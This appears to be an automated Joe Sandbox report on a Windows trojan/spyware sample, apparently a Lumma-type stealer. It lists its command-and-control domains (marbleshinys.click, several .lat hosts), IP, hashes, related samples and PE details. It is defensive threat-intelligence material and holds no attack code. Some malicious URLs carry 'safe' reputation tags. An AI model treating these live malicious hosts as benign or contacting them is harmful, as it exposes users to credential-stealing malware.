                https://marbleshinys.click/0%Avira URL Cloudsafe
                https://marbleshinys.click:443/apiLSID0%Avira URL Cloudsafe
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=16965004544005000%Avira URL Cloudsafe
                https://marbleshinys.click/((0%Avira URL Cloudsafe
                marbleshinys.click0%Avira URL Cloudsafe
                https://marbleshinys.click/apiJr0%Avira URL Cloudsafe
                https://marbleshinys.click/7Q0%Avira URL Cloudsafe
                https://marbleshinys.click/pi0%Avira URL Cloudsafe
                http://crl.microsoft(40%Avira URL Cloudsafe
                https://marbleshinys.click/api8s0%Avira URL Cloudsafe
                https://marbleshinys.click/apiQ0%Avira URL Cloudsafe
                https://marbleshinys.click/apiP0%Avira URL Cloudsafe
                https://marbleshinys.click:443/api0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                marbleshinys.click
                		172.67.148.118
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  curverpluch.latfalse
                    		high
                    slipperyloo.latfalse
                      		high
                      tentabatte.latfalse
                        		high
                        manyrestro.latfalse
                          		high
                          https://marbleshinys.click/apitrue
                          • Avira URL Cloud: safe
                          		unknown
                          bashfulacid.latfalse
                            		high
                            wordyfindy.latfalse
                              		high
                              marbleshinys.clicktrue
                              • Avira URL Cloud: safe
                              		unknown
                              shapestickyr.latfalse
                                		high
                                talkynicer.latfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabdxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.microsoftdxdiag.exe, 00000002.00000002.1643357377.0000000003031000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1571272583.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1567861669.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1570587188.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1570198116.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1569901131.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566987811.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1576883133.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1578784333.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1583499340.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566093282.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1569019682.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566706853.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1567162517.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565979094.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1578277745.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1568656377.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566813341.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&ctadxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYidxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639dxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://marbleshinys.click/apivdxdiag.exe, 00000002.00000002.1643999732.000000000304E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://marbleshinys.click/kw5dxdiag.exe, 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://marbleshinys.click/3wdxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://marbleshinys.click:443/apiLSIDdxdiag.exe, 00000002.00000003.1640390200.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638835789.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643295650.0000000002FE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://marbleshinys.click/Sv=dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://marbleshinys.click/jgESdxdiag.exe, 00000002.00000003.1554662253.00000000054CD000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1552892573.00000000054CD000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1552078829.00000000054C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://marbleshinys.click/;vdxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://x1.c.lencr.org/0dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://x1.i.lencr.org/0dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://marbleshinys.click/dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1609907561.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523098784.0000000002FC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://marbleshinys.click/Kvdxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://support.mozilla.org/products/firefoxgro.alldxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://marbleshinys.click/apiJrdxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000003022000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icodxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://marbleshinys.click/((dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://ocsp.rootca1.amazontrust.com0:dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500dxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://marbleshinys.click/pidxdiag.exe, 00000002.00000003.1638835789.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://marbleshinys.click/7Qdxdiag.exe, 00000002.00000003.1523232930.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.ecosia.org/newtab/dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brdxdiag.exe, 00000002.00000003.1554753825.000000000574C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.microsoft(4dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgdxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://marbleshinys.click/apiPdxdiag.exe, 00000002.00000003.1638321610.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643222941.0000000002FB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://marbleshinys.click/api8sdxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640150233.0000000003022000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&udxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://marbleshinys.click/apiQdxdiag.exe, 00000002.00000003.1565623403.000000000304E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgdxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://marbleshinys.click:443/apidxdiag.exe, 00000002.00000003.1565428640.0000000005427000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1609383602.0000000005423000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565213278.0000000005423000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1645464639.0000000005427000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                172.67.148.118
                                                                                		marbleshinys.clickUnited States
                                                                                		13335CLOUDFLARENETUStrue

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1582432
                                                                                Start date and time:2024-12-30 15:54:09 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 4m 54s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:6
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:PI1EA8P74K.exe
                                                                                renamed because original name is a hash value
                                                                                Original Sample Name:4de5ddc2a970f98efe99dc22c5b2de78.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                                                EGA Information:Failed
                                                                                HCA Information:Failed
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Stop behavior analysis, all processes terminated

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target PI1EA8P74K.exe, PID 7952 because there are no executed function
                                                                                • Execution Graph export aborted for target dxdiag.exe, PID 8016 because there are no executed function
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: PI1EA8P74K.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                09:55:27API Interceptor8x Sleep call for process: dxdiag.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                No context

                                                                                Domains

                                                                                No context

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUShttps://aiihsr.com/FloridaCUGet hashmaliciousUnknownBrowse
                                                                                • 1.1.1.1
                                                                                https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                • 104.18.35.227
                                                                                https://btrhbfeojofxcpxuwnsp5h7h22htohw4btqegnxatocbkgdlfiawhyid.atGet hashmaliciousUnknownBrowse
                                                                                • 104.21.20.126
                                                                                https://btrhbfeojofxcpxuwnsp5h7h22htohw4btqegnxatocbkgdlfiawhyid.atGet hashmaliciousUnknownBrowse
                                                                                • 172.67.192.228
                                                                                eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.18.19
                                                                                PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                • 188.114.97.3
                                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                                • 172.67.144.225
                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                • 172.67.144.225
                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                • 172.67.144.225

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                a0e9f5d64349fb13191bc781f81f42e1eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.148.118
                                                                                PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                • 172.67.148.118
                                                                                universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                • 172.67.148.118
                                                                                Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                • 172.67.148.118
                                                                                universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                • 172.67.148.118
                                                                                6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.148.118
                                                                                lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                • 172.67.148.118
                                                                                vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 172.67.148.118
                                                                                AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 172.67.148.118

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                No created / dropped files found

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Entropy (8bit):7.780281566097344
                                                                                TrID:
                                                                                • Win64 Executable GUI (202006/5) 91.80%
                                                                                • Win64 Executable (generic) (12005/4) 5.46%
                                                                                • Clipper DOS Executable (2020/12) 0.92%
                                                                                • Generic Win/DOS Executable (2004/3) 0.91%
                                                                                • DOS Executable Generic (2002/1) 0.91%
                                                                                File name:PI1EA8P74K.exe
                                                                                File size:12'940'800 bytes
                                                                                MD5:4de5ddc2a970f98efe99dc22c5b2de78
                                                                                SHA1:2dec8ea0a05c5284f0db5573b3608b64bf94375d
                                                                                SHA256:d24037cf570f9b0aa4337a9397eca861d2d3b0891b18a924c9ae6ad466a95de4
                                                                                SHA512:9d7346b310c1425b826c486773444d68c0cf9df21d1438bffe7eda86c29c09bcd5deb66ad45387b80f06cc261bac6558742c7fde37bb23bbd1987c2f80d3bd82
                                                                                SSDEEP:196608:d7WJDMIpNsG+g2t6tDTG1X9TtZf2tXIS867rtnt6rxrWOHecRCwpd:KDMurM6tY0qSXVt6ocoy
                                                                                TLSH:1BD6E0298A76C9C4F15BA030FCA614638B71F519DBAD99F936620641CFC7032DFDA239
                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....kg.........."..................'.........@..........................................`........................................

                                                                                File Icon

                                                                                Icon Hash:90cececece8e8eb0

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x1400527c8
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x140000000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                Time Stamp:0x676BCCBE [Wed Dec 25 09:13:34 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:7bb4e8cef6a9f350a8f5dc71e7b3773c

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                dec eax
                                                                                sub esp, 28h
                                                                                call 00007F2448C35FC0h
                                                                                dec eax
                                                                                add esp, 28h
                                                                                jmp 00007F2448C35E2Fh
                                                                                int3
                                                                                int3
                                                                                dec eax
                                                                                mov dword ptr [esp+18h], ebx
                                                                                push ebp
                                                                                dec eax
                                                                                mov ebp, esp
                                                                                dec eax
                                                                                sub esp, 30h
                                                                                dec eax
                                                                                mov eax, dword ptr [00BB4910h]
                                                                                dec eax
                                                                                mov ebx, 2DDFA232h
                                                                                cdq
                                                                                sub eax, dword ptr [eax]
                                                                                add byte ptr [eax+3Bh], cl
                                                                                ret
                                                                                jne 00007F2448C36026h
                                                                                dec eax
                                                                                and dword ptr [ebp+10h], 00000000h
                                                                                dec eax
                                                                                lea ecx, dword ptr [ebp+10h]
                                                                                call dword ptr [00A6C3B2h]
                                                                                dec eax
                                                                                mov eax, dword ptr [ebp+10h]
                                                                                dec eax
                                                                                mov dword ptr [ebp-10h], eax
                                                                                call dword ptr [00A6C334h]
                                                                                mov eax, eax
                                                                                dec eax
                                                                                xor dword ptr [ebp-10h], eax
                                                                                call dword ptr [00A6C320h]
                                                                                mov eax, eax
                                                                                dec eax
                                                                                lea ecx, dword ptr [ebp+18h]
                                                                                dec eax
                                                                                xor dword ptr [ebp-10h], eax
                                                                                call dword ptr [00A6C418h]
                                                                                mov eax, dword ptr [ebp+18h]
                                                                                dec eax
                                                                                lea ecx, dword ptr [ebp-10h]
                                                                                dec eax
                                                                                shl eax, 20h
                                                                                dec eax
                                                                                xor eax, dword ptr [ebp+18h]
                                                                                dec eax
                                                                                xor eax, dword ptr [ebp-10h]
                                                                                dec eax
                                                                                xor eax, ecx
                                                                                dec eax
                                                                                mov ecx, FFFFFFFFh

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xabe7b00x28.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc120000x1b4.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0xc0a0000x4428.pdata
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc130000x4c524.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x9dbd600x28.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x9d62800x140.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xabea780x2a0.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x6878a0x68800a368ee41568424c3f3c0b8c18791568dFalse0.5257597562799043data6.766936330294184IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x6a0000xa5925c0xa594004e05a882baaf40f29c81aebd059f8166unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0xac40000x1459c00x1440009dd19c9b2057765d2627aefd888068cfFalse0.4261519820601852data4.724497366288815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .pdata0xc0a0000x44280x4600d5adbcaac954a79474c346b366fdea36False0.4851004464285714data5.714887184964475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .fptable0xc0f0000x1000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .tls0xc100000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                _RDATA0xc110000x2800x400efa049dab2667534f44e1c44ca45f0dbFalse0.28515625data3.1757690215177306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xc120000x1b40x2005c9852e239596975f01e05a6614b1fbcFalse0.486328125data5.0961877881966595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0xc130000x4c5240x4c60057341f30cdddff777a6363d9085c0ed4False0.015410827536824876data5.431258911581813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_MANIFEST0xc120580x15bASCII text, with CRLF line terminatorsEnglishUnited States0.5446685878962536

                                                                                Imports

                                                                                DLLImport
